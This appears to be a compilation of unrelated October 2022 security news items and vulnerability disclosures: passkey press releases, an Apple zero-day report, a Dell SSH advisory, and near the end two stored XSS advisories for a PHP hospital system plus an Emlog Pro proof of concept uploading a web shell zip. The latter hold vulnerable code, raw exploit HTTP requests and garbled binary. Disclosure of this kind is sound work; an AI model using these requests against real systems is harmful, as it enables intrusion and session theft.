Passkeys are designed to replace passwords and allow seamless logins for consumers across devices and platforms.

SAN JOSE, Calif., Oct. 24, 2022 /PRNewswire/ — Today, PayPal announced it is adding passkeys as an easy and secure log in method for PayPal accounts. Passkeys are a new industry standard created by the FIDO Alliance and the World Wide Web Consortium that replace passwords with cryptographic key pairs, offering customers a simple and secure way to log in to PayPal based on technology that is resistant to phishing and designed so that there is no shared passkey data between platforms. The new PayPal log in option will first be available to iPhone, iPad, or Mac users on PayPal.com and will expand to additional platforms as those platforms add support for passkeys.

A founding member of the FIDO Alliance, PayPal is one of the first financial services companies to make passkeys widely available to its users. This cutting-edge security standard is significant as passkeys address one of the biggest security problems on the web, which is the weakness of password authentication. Over 2.6 billion records were hacked in 2017 and of these hacks, 81% are estimated to have been caused by password stealing and guessing1. Many consumers recycle passwords across online services, which can not only be cumbersome but can also lead consumers to reuse the same, potentially vulnerable passwords across services. Passkeys are designed to replace passwords for an even more seamless and secure login experience with PayPal.

Passkeys will also help more consumers complete their purchases with PayPal - once PayPal users create a passkey, they won't have to remember their password, allowing them to check out with greater ease. According to a recent survey of U.S. consumers, 44% of consumers have abandoned an online purchase because they forgot a password.2

"Launching passkeys for PayPal is foundational to our commitment to offering our customers safe, secure and easy ways to access and manage their daily financial lives," said Doug Bland, SVP and GM, Head of Consumer, PayPal. "We are excited to provide our customers a more seamless checkout experience that eliminates the risks of weak and reused credentials and removes the frustration of remembering a password. We are making it easier for customers to shop online."

**How to Create a PayPal Passkey**

Creating and using a passkey with PayPal is a quick and easy process on an Apple device. Once created, passkeys are synced with iCloud Keychain, ensuring a strong, private relationship between a customer and their device, and an easy sign-in experience for PayPal users with devices running iOS 16, iPadOS 16.1, or macOS Ventura.

*   Once existing customers log in to PayPal with a browser on desktop or mobile web using their existing PayPal credentials such as a username and password, they will have the option to "Create a passkey."
*   Customers will then be prompted to authenticate with Apple Face ID or Touch ID. Then the passkey will be automatically created, and next time PayPal customers log in, they won't need to use or manage a password again.

**PayPal Passkeys Can Be Used to Log In on Any Device**

If they have devices that don't support passkeys yet, users can still use an iPhone to log in with a PayPal passkey. Users simply scan the QR code that will appear after they enter their PayPal User ID.

PayPal passkeys will start rolling out today to customers in the U.S.. PayPal passkeys will become available in additional countries early in 2023, and on additional technology platforms as they add support for passkeys.

**About PayPal**

PayPal has remained at the forefront of the digital payment revolution for more than 20 years. By leveraging technology to make financial services and commerce more convenient, affordable, and secure, the PayPal platform is empowering more than 429 million consumers and merchants in more than 200 markets to join and thrive in the global economy. For more information, visit paypal.com.

PayPal Introduces More Secure Payments with Passkeys

Tech giant Apple on Monday rolled out updates to remediate a zero-day flaw in iOS and iPadOS that it said has been actively exploited in the wild.
The weakness, given the identifier CVE-2022-42827, has been described as an out-of-bounds write issue in the Kernel, which could be abused by a rogue application to execute arbitrary code with the highest privileges.
Successful exploitation of

Tech giant Apple on Monday rolled out updates to remediate a zero-day flaw in iOS and iPadOS that it said has been actively exploited in the wild.

The weakness, given the identifier CVE-2022-42827, has been described as an out-of-bounds write issue in the Kernel, which could be abused by a rogue application to execute arbitrary code with the highest privileges.

Successful exploitation of out-of-bounds write flaws, which typically occur when a program attempts to write data to a memory location that's outside of the bounds of what it is allowed to access, can result in corruption of data, a crash, or execution of unauthorized code.

The iPhone maker said it addressed the bug with improved bounds checking, while crediting an anonymous researcher for reporting the vulnerability.

As is usually the case with actively exploited zero-day flaws, Apple refrained from sharing more specifics about the shortcoming other than acknowledging that it's "aware of a report that this issue may have been actively exploited."

CVE-2022-42827 is the third consecutive Kernel-related out-of-bounds memory vulnerability to be patched by Apple after CVE-2022-32894 and CVE-2022-32917, the latter two of which have also been previously reported to be weaponized in real-world attacks.

The security update is available for iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later.

With the latest fix, Apple has closed out eight actively exploited zero-day flaws and one publicly-known zero-day vulnerability since the start of the year -

*   **CVE-2022-22587** (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-22594** (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
*   **CVE-2022-22620** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-22674** (Intel Graphics Driver) – An application may be able to read kernel memory
*   **CVE-2022-22675** (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32893** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-32894** (Kernel) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32917** (Kernel) – An application may be able to execute arbitrary code with kernel privileges

Aside from CVE-2022-42827, the update also addresses 19 other security vulnerabilities, including two in Kernel, three in Point-to-Point Protocol (PPP), two in WebKit, and one each in AppleMobileFileIntegrity, Core Bluetooth, IOKit, Sandbox, and more.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases Patch for New Actively Exploited iOS and iPadOS Zero-Day Vulnerability

Categories: Podcast
This past summer, a woman's bag was stolen from her gym locker in London. Just hours later, thousands of pounds had been drained from her bank. 



(Read more...)




The post A gym heist in London goes cyber appeared first on Malwarebytes Labs.

Posted: October 24, 2022 by

A thief has been stalking London. 

This past summer, multiple women reported similar crimes to the police: While working out at their local gyms, someone snuck into the locker rooms, busted open their locks, stole their rucksacks and gym bags, and then, within hours, purchased thousands of pounds of goods. Apple, Selfridges, Balenciaga, Harrod's—the thief has expensive taste. 

At first blush, the crimes sound easy to explain: A thief stole credit cards and used them in person at various stores before they could be caught. 

But for at least one victim, the story is more complex.  

In August, Charlotte Morgan had her bag stolen during an evening workout at her local gym in Chiswick. The same pattern of high-price spending followed—the thief spent nearly £3,000 at an Apple store in West London, another £1,000 at a separate Apple store, and then almost £700 at Selfridges. But upon learning just how much the thief had spent, Morgan realized something was wrong: She didn't have that much money in her primary account. To access all of her funds, the thief would have needed to make a transfer out of her savings account, which would have required the use of her PIN. 

"\[My PIN is\] not something they could guess... So I thought 'That's impossible,'" Morgan told the Lock and Code podcast. But, after several calls with her bank and in discussions with some cybersecurity experts, she realized there could be a serious flaw with her online banking app. "But the bank... what they failed to mention is that every customer's PIN can actually be viewed on the banking app once you logged in."

Today on the Lock and Code podcast with host David Ruiz, we speak with Charlotte Morgan about what happened this past summer in London, what she did as she learned about the increasing theft of her funds, and how one person could so easily abuse her information. 

Tune in today to also learn about what you can do to help protect yourself from this type of crime. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

A gym heist in London goes cyber

Nok Nok, an inventor of FIDO authentication standards, announces full support for passkeys in its S3 Authentication Suite that allows organizations to replace passwords.

**San Jose, Calif., Oct. 24, 2022** — Nok Nok, a leader in FIDO customer authentication (Fast IDentity Online) and a founder of the FIDO Alliance, today announced full support for passkeys — the FIDO and key-based passwordless sign-in technology standard for replacing passwords.

As stated in Verizon’s 2021 Data Breach Investigations Report, over 80% of successful cyber-attacks start with an account takeover with cybercriminals using sophisticated phishing strategies to steal account credentials based on passwords and personal secrets. With cybercrime accelerating dramatically, online service providers are now only beginning to understand the real cost and risk of propagating the use of passwords and the legacy security infrastructure used to store and use them.

**The arrival of passkeys, the replacement for passwords**

Passkeys — the new name for passwordless FIDO credentials — are widely viewed as the replacement to end the use of passwords. Current FIDO standards for single-device passkeys are supported by major platforms today. In May 2022, Apple, Microsoft and Google announced multi-device passkeys will be natively available in the OEMs’ devices, operating systems and platforms to enable safer, faster, and more consistent sign-ins to consumer online services across web and mobile devices.

By offering the same safety and convenience for signing into online services as the trusted biometric authentication consumers use to sign into their devices, FIDO passkeys offer consumers modern, safe and fast access to all of their online services and in the future, to their in-home and IoT devices, and even to their vehicles.

To implement passkeys, online service providers must leverage a FIDO authentication server and related client software to support both single-device and multi-device passkeys.

**S3’s innovative approach to passkeys**

As an early inventor of FIDO specifications, Nok Nok and its S3 Authentication Suite offer the first customer passwordless authentication platform built from the ground up based on FIDO standards, with full support for both single-device and multi-device passkeys. Nok Nok’s S3 Suite provides privacy-compliant, passwordless authentication across platforms and is designed to operate in the most demanding consumer environments, at global scale. Nok Nok’s S3 Authentication Server also offers FIDO features that enable online service providers to offer safe and secure passkey access to consumer services leveraging home, entertainment and IoT devices.

For companies that have not yet incorporated FIDO-enabled technologies into their services, with the Nok Nok S3 solution they can now support traditional FIDO single-device credentials and the latest multi-device passkeys with a single authentication infrastructure. For companies who have already transitioned some or all of their customer authentication to leverage FIDO standards, with the Nok Nok S3 solution they can fully support passkey credentials with no code changes. For Nok Nok customers already supporting Nok Nok iOS FIDO authentication, the currently available passkeys “just-work.”

As stated by Dr. Rolf Lindemann, Nok Nok’s VP of Products and one of the original authors of the FIDO standard, “_Nok Nok has been working with the industry and our large customers to operationalize the FIDO protocols in the real world with real world benefits. This discipline of commercializing FIDO innovations has led to an extensive portfolio of patented FIDO capabilities and to the evolution from single device keys to multi-device passkeys.”_

Dr. Lindemann shared, _“For our customers who have already adopted our S3 platform, no code changes are required to support passkeys on iOS 16+ and we support the device public key option announced for Google’s Android. Additionally, our S3 Suite allows native consumer apps to combine single-device credentials through FIDO “silent authenticators” with multi-device credentials to improve the control of relying parties - even on platforms not supporting the device public key option, simplifying regulatory compliance.”_

The advanced granular adaptive orchestration of Nok Nok’s S3 authentication platform includes a rules engine that allows replying parties to easily configure sign-up, sign-in and recovery flows for passkeys that dynamically respond to contextual user data. In addition, Nok Nok’s S3 Intelligent Passwordless AuthenticationTM enables user experience flows to automatically respond to the (FIDO) authenticator characteristics of their consumers’ devices in real-time with passkeys.

**The FIDO benefits trifecta**

By making use of authentication signals on consumer devices, with FIDO sign-up and sign-in, Nok Nok’s customers have created seamless user experiences that remove friction and complexity associated with authentication and account recovery, which dramatically increases the speed and success rates of sign-in.

Many of Nok Nok’s banking, telco and fintech customers have achieved sign-in success rates of 99.5% and sign-in speed increases of 100% to 200% - with today’s single-device passkeys. Since multi-device passkeys are expected to dramatically increase consumer FIDO adoption across OEM devices, these substantial benefits are now available to all online service providers who support passkeys by implementing a leading FIDO server with robust authentication capabilities such as Nok Nok’s S3 Suite.

In addition, reductions in sign-up, sign-in and account recovery friction result in a material reduction of calls into customer care centers. At an industry-average cost of $70-$90 per call to remediate account-related problems, the adoption of FIDO passkeys can save online service providers millions of dollars in annual OPEX.

Last but most important, FIDO passkeys protect consumers from account takeovers that start with stolen credentials. Passkeys are described as “phishing-resistant”, although some of the OEMs have stated passkeys are “unphishable”. In sign-ins that only use passkeys, the keys are accessed during sign-in, but passkeys remain on the device and server. The keys are never passed for attackers to steal enroute - protecting consumers from sophisticated phishing attacks.

“_Ten years ago our founding industry group designed FIDO as a new framework for providing better usability, security and privacy. We also intended the framework to reduce the cost and complexity of enterprise infrastructure. Today, FIDO passkeys offer the trifecta of business benefits — improved customer security and privacy with less friction and lower operating cost to the enterprise. Passwords are the single greatest pain point on the internet and at Nok Nok, we are thrilled to announce our seamless platform support for consumer passkeys — signaling the beginning of the end of passwords worldwide,” said Nok Nok CEO Phillip Dunkelberger._

**About Nok Nok**

Nok Nok is a global leader in passwordless consumer authentication. Delivering the most innovative FIDO services for the authentication market today, Nok Nok empowers global organizations to dramatically improve their user experience and security, and reduce operating expenses, while meeting the most advanced privacy and regulatory requirements. The Nok Nok™ S3 Authentication Suite integrates into existing security environments to deliver proven, FIDO-standards-based passwordless consumer authentication. Headquartered in Silicon Valley, California, the company has delivered unique inventions and innovations that are protected by a robust global patent portfolio. As a founder of the FIDO Alliance and an innovator of FIDO standards, Nok Nok is an expert in modern consumer authentication. Nok Nok’s global customers trust their customer authentication with the S3 platform and include Verizon, Intuit, T-Mobile, BBVA, NTT Docomo, MUFG, Japan Post Bank, AFLAC, Standard Bank, Fujitsu Limited, and Hitachi. For more information, visit www.noknok.com.

Nok Nok, a Global Leader in Customer Passwordless Authentication, Releases Full Support for Passkeys

The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.

**Vaikutus**

Medium

**Overview**

**Summary:**      
The SSHD configuration within Dell EMC Isilon OneFS requires a remediation to address a vulnerability. 

**Tiedot**

*    **Incorrect Default Permissions Vulnerability**

CVE-2020-5355

The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.

CVSS v3.1 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

*    **Incorrect Default Permissions Vulnerability**

CVE-2020-5355

The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.

CVSS v3.1 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Affected products:**     
Dell EMC Isilon OneFS versions 8.2.2 and earlier.

For Dell EMC Isilon OneFS versions 8.2.2 and earlier, see the Workaround section below.

**Workaround:**      
There are three options available to workaround this issue:   

*   Disable users with restricted shells (by default, only the remotesupport user).
*   Modify the SSH server configuration to disable forwarding of UNIX domain and TCP sockets for all users.
*   For OneFS versions prior to 8.2.0 only, modify the SSH server configuration to disable forwarding of UNIX domain and TCP sockets for users with restricted shells.

  
**Disable users with restricted shells**

1.  Open a secure shell (SSH) connection to any node in the cluster and log in as root.
    
2.  Run the following command:   
    

**isi auth users modify remotesupport --enabled=false**

  
**Disable forwarding of UNIX domain and TCP sockets**  
**For 8.2.0 and later:**   

1.  Open a secure shell (SSH) connection to any node in the cluster and log in as root.
    
2.  Run the following commands:    
    

**isi\_gconfig -t ssh-config allow\_tcp\_forwarding=no  
isi\_gconfig -t ssh-config allow\_stream\_local\_forwarding=no**

  
**Versions prior to 8.2.0**

1.  Open a secure shell (SSH) connection to each node in the cluster and log in as root.
    
2.  On each node, set the following in the /etc/mcp/templates/sshd\_config file:    
    

**AllowStreamLocalForwarding=no  
AllowTcpForwarding=no**

**Note: (Versions prior to 8.2.0 only)** Modify the SSH server config to disable forwarding of UNIX domain and TCP sockets for users with restricted shells.

1.  Open a secure shell (SSH) connection to each node in the cluster and log in as root.
    
2.  On each node, append the following to the end of the /etc/mcp/templates/sshd\_config file:    
    

**Match User remotesupport**

**AllowStreamLocalForwarding=no  
AllowTcpForwarding=no**

**Note:** To make these settings persist, see KB article 530021: {Isilon} - SSH: How to modify the the sshd\_config file to persist upgrades

**CAUTION:** The Match keyword will open a conditional block that applies until either another Match line or the end of the file. If a keyword appears in multiple Match blocks that are satisfied, only the first instance of the keyword is applied.

  

**Affected products:**     
Dell EMC Isilon OneFS versions 8.2.2 and earlier.

For Dell EMC Isilon OneFS versions 8.2.2 and earlier, see the Workaround section below.

**Workaround:**      
There are three options available to workaround this issue:   

*   Disable users with restricted shells (by default, only the remotesupport user).
*   Modify the SSH server configuration to disable forwarding of UNIX domain and TCP sockets for all users.
*   For OneFS versions prior to 8.2.0 only, modify the SSH server configuration to disable forwarding of UNIX domain and TCP sockets for users with restricted shells.

  
**Disable users with restricted shells**

1.  Open a secure shell (SSH) connection to any node in the cluster and log in as root.
    
2.  Run the following command:   
    

**isi auth users modify remotesupport --enabled=false**

  
**Disable forwarding of UNIX domain and TCP sockets**  
**For 8.2.0 and later:**   

1.  Open a secure shell (SSH) connection to any node in the cluster and log in as root.
    
2.  Run the following commands:    
    

**isi\_gconfig -t ssh-config allow\_tcp\_forwarding=no  
isi\_gconfig -t ssh-config allow\_stream\_local\_forwarding=no**

  
**Versions prior to 8.2.0**

1.  Open a secure shell (SSH) connection to each node in the cluster and log in as root.
    
2.  On each node, set the following in the /etc/mcp/templates/sshd\_config file:    
    

**AllowStreamLocalForwarding=no  
AllowTcpForwarding=no**

**Note: (Versions prior to 8.2.0 only)** Modify the SSH server config to disable forwarding of UNIX domain and TCP sockets for users with restricted shells.

1.  Open a secure shell (SSH) connection to each node in the cluster and log in as root.
    
2.  On each node, append the following to the end of the /etc/mcp/templates/sshd\_config file:    
    

**Match User remotesupport**

**AllowStreamLocalForwarding=no  
AllowTcpForwarding=no**

**Note:** To make these settings persist, see KB article 530021: {Isilon} - SSH: How to modify the the sshd\_config file to persist upgrades

**CAUTION:** The Match keyword will open a conditional block that applies until either another Match line or the end of the file. If a keyword appears in multiple Match blocks that are satisfied, only the first instance of the keyword is applied.

  

**Kiitokset**

Dell would like to thank Andre Protas with Apple Information Security for reporting this issue.

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

23 marrask. 2021

CVE-2020-5355: DSA-2020-096: Dell EMC Isilon OneFS Security Update for Insecure SSHD Configuration Vulnerability

At the Authenticate Conference, Google and Microsoft demonstrated their passkey prototypes. Apple, meanwhile, already launched its version in iOS 16.

Apple, Google, and Microsoft are in the early stages of delivering on their plan to provide passkeys based on the FIDO Alliance's new passwordless authentication standard. But eliminating passwords won't happen overnight.

The three leading device and platform providers in May collectively announced they would incorporate the new passkeys into their respective platforms. Passkeys are based on the FIDO2 standard, which consists of World Wide Web Consortium's (W3C) Web Authentication (WebAuthn) specification and FIDO Alliance's Client-to-Authenticator Protocol (CTAP).

**Passkeys Start to Roll Out**

As expected, Apple became the first provider to provide passkeys with its iOS 16 release late last month, giving millions of iPhones and iPads the ability to use passkeys. Mac users will also be able to implement passkeys when Apple releases its newest operating system update, macOS Ventura, which is due to arrive this month. Last week Google released passkey betas for Android and Chrome.

Once a user sets up a passkey on one Apple device, it can synchronize with any other supported Apple client or service using iCloud Keychain. Also, when a user enrolls one device with a passkey, they can automatically enroll any other Apple device and service that supports them.

Google's passkey beta lets users create and use passkeys on their Android devices and securely sync them via Google Password Manager. Google software engineer Arnar Birgisson explained in a blog post that passkeys in Google Password Manager are always encrypted end to end.

"When a passkey is backed up, its private key is uploaded only in its encrypted form using an encryption key that is only accessible on the user's own devices," Birgisson noted. "This protects passkeys against Google itself, or e.g. a malicious attacker inside Google. Without access to the private key, such an attacker cannot use the passkey to sign-in to its corresponding online account."

**Demonstrating the Future**

Google and Microsoft demonstrated their implementations of passkeys to hundreds of identity and security experts at this week's Authenticate 2022 conference in Seattle. Google identity and security product manager Christiaan Brand demonstrated how to sign into an account with passkeys, which will appear in an Android update by December. Brand said anyone could sign up for the developer beta in the Google Play Services channel.

"The moment you sign up for this with a particular Google account, you will be able to get the latest updates on your device within a couple of minutes," Brand said. Passkeys for Chrome OS are on the road map for release next year, he added.

Brand and other identity and security experts at the conference emphasized that authenticating with passkeys is considerably more secure than passwords because they aren't vulnerable to phishing attacks or other compromises. Passkeys are also easier to use because they consist of cryptographic keys that can run on supported devices and cloud services.

Although Microsoft doesn't plan to offer passkeys in Windows until next year, the company demonstrated its implementation and shared various observations. For example, Microsoft would like to run passkeys alongside the company's Authenticator app, according to senior program manager for identity Scott Bingham.

"Passkeys are multidevice, FIDO credentials that are a really compelling solution," Bingham said. "It can be synced through a platform cloud and available to use on all your devices when you sign into the same platform account." 

While Windows Hello provides biometric authentication for unlocking a PC's OS screen, it will also enable the new passkeys.

**Integrating Online Services and Apps**

For passkeys to take off, websites and enterprises that use usernames and passwords for authentication must add support for passkeys. Thousands of organizations worldwide have deployed or are deploying FIDO authentication, enabling them to support passkeys, according to FIDO Alliance executive director Andrew Shikiar, in his opening remarks at the conference.

Among them is PayPal, which last year hired a founding member of the FIDO Alliance, Marcio Mello, as head of product for the PayPal Identity Platform. Mello said PayPal plans to offer support for passkeys in the US for a limited number of customers.

Using an iPhone with the new iOS 16, Mello demonstrated how to create a passkey with PayPal. He then explained that when using iCloud Keychain on a Mac with the updated OS, the passkey is available automatically. When using a device that doesn't yet support passkeys, if the user had already created one, they could access it by generating a QR code.

"This provides that amazing combination we've been waiting for, both convenience and security," Mello said. "Something that's absolutely required for us to be able to reach the large-scale consumer deployment that we'd be looking for worldwide."

While passwords remain the most common credentials for authentication, they are costly to organizations, according to the FIDO Alliance's Online Authentication Barometer, published this week. The study found that 59% of respondents give up accessing online accounts when they can't remember their password, and roughly 40% abandon purchases for the same reason. The survey also found that 39% are familiar with passkeys.

**Adoption Will Be Slow**

Throughout the conference, organized by the FIDO Alliance, there appeared to be widespread optimism among identity and security experts that the standardized cryptographic keys promise to pave the way to a future of passwordless authentication to devices, online services, and applications.

"Passkeys stand to take passwords out of play for hundreds of millions of consumers immediately," Shikiar said. How immediately passkeys replace passwords remains to be seen, but it will likely be years before they become mainstream, as some people signaled in their presentations.

The widespread adoption of passkeys is promising because users can reuse their credentials among different vendor ecosystems, says Gartner analyst Paul Rabinovich. Because passkeys registered on one device can complete authentication from another device, "we'll finally see wide adoption of software-based roaming authenticators" embedded as mobile apps or within operating systems, he says.

Passkey Demos Hint at What's Ahead for Passwordless Authentication

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via add-patient.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

In the **add-patient.php** file, several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

      /\* ... \*/

if(isset($\_POST\['submit'\]))
{
    $docid=$\_SESSION\['id'\];
    $patname=$\_POST\['patname'\];
    $patcontact=$\_POST\['patcontact'\];
    $patemail=$\_POST\['patemail'\];
    $gender=$\_POST\['gender'\];
    $pataddress=$\_POST\['pataddress'\];
    $patage=$\_POST\['patage'\];
    $medhis=$\_POST\['medhis'\];
    $sql=mysqli\_query($con,"insert into tblpatient(Docid,PatientName,PatientContno,PatientEmail,PatientGender,PatientAdd,PatientAge,PatientMedhis)
values('$docid','$patname','$patcontact','$patemail','$gender','$pataddress','$patage','$medhis')");

      /\* ... \*/

In the **admin/manage-patients.php**, **doctor/manage-patient.php**, **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      /\* Example from doctor/view-patient.php\*/

$vid=$\_GET\['viewid'\];
$ret=mysqli\_query($con,"select \* from tblpatient where ID='$vid'");
$cnt=1;
while ($row=mysqli\_fetch\_array($ret)) {

    /\* ... \*/
    echo $row\['PatientName'\];
    /\* ... \*/
    echo $row\['PatientEmail'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientAdd'\];
    /\* ... \*/
    echo $row\['PatientGender'\];
    /\* ... \*/
    echo $row\['PatientMedhis'\];
    /\* ... \*/
    echo $row\['CreationDate'\];
    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **patname**, **patemail**, **gender**, **pataddress** and **medhis** POST parameters.  
The following is one of the possible exploitation using the **medhis POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: localhost
Content-Length: 180
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

patname=Name4&patcontact=3124432845&patemail=Name3%40mail.com&gender=male&pataddress=3021+Halsted+St%2C+Chicago&patage=40&medhis=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42205: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2 | Systems and Internet Security Lab

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patient.php, and view-medhistory.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

The files **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** share a common piece of code where several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

    /\* ... \*/

if(isset($\_POST\['submit'\]))
{

    $vid=$\_GET\['viewid'\];
    $bp=$\_POST\['bp'\];
    $bs=$\_POST\['bs'\];
    $weight=$\_POST\['weight'\];
    $temp=$\_POST\['temp'\];
    $pres=$\_POST\['pres'\];

    $query.=mysqli\_query($con,"insert tblmedicalhistory(PatientID,BloodPressure,BloodSugar,Weight,Temperature,MedicalPres) 
value('$vid','$bp','$bs','$weight','$temp','$pres')");

    
    /\* ... \*/

In the same files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      
    /\* ...\*/

while ($row=mysqli\_fetch\_array($ret)) { 

    echo $cnt;
    echo $row\['BloodPressure'\];
    echo $row\['Weight'\];
    echo $row\['BloodSugar'\];
    echo $row\['Temperature'\];
    echo $row\['MedicalPres'\];
    echo $row\['CreationDate'\];

    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **bp**, **bs**, **weight**, **temp** and **pres** POST parameters.  
The following is one of the possible exploitation using the **pres POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3 HTTP/1.1
Host: localhost
Content-Length: 94
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

bp=120%2F85&bs=12&weight=70kg&temp=36&pres=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42206: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3 | Systems and Internet Security Lab

Emlog Pro 1.6.0 plugins upload suffers from a remote code execution (RCE) vulnerability.

    POST /emlog/admin/plugin.php?action=upload_zip HTTP/1.1
    Host: 192.168.111.155
    Content-Length: 876
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.111.155
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary804UeairFtrET9Lt
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.111.155/emlog/admin/plugin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lq0s731hnlqm232itjlgpc27el; EM_AUTHCOOKIE_jT79impSwTWeimzUBIsgAmv1NoQbG2Zs=admin%7C1695536025%7C848fc865191736412177851eb6082b92; em_saveLastTime=1664436503884
    Connection: close
    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="pluzip"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
    PK���   � Mq=Ua郵/?    �  �   shell/shell.php=?K聾 嗺凔�78h嘍�2渹�v�裫]Dと??$W称��"XjQ皛Q礑??轌3?乿}哏}y��=觾@/@癴撰杻V+5倯x岹儊竲哷孁佸:�蚷?猏Z?,揱戏<氉�賬岈ノ�湞獈煶埑'R齿獙哮甙!?>靾?綱漜晅U?砭7it愴矐堬%{L�z�悏雀╊>��栮詔}岒O懘e隿�鍶趣?爱嘺ㄥ愭�
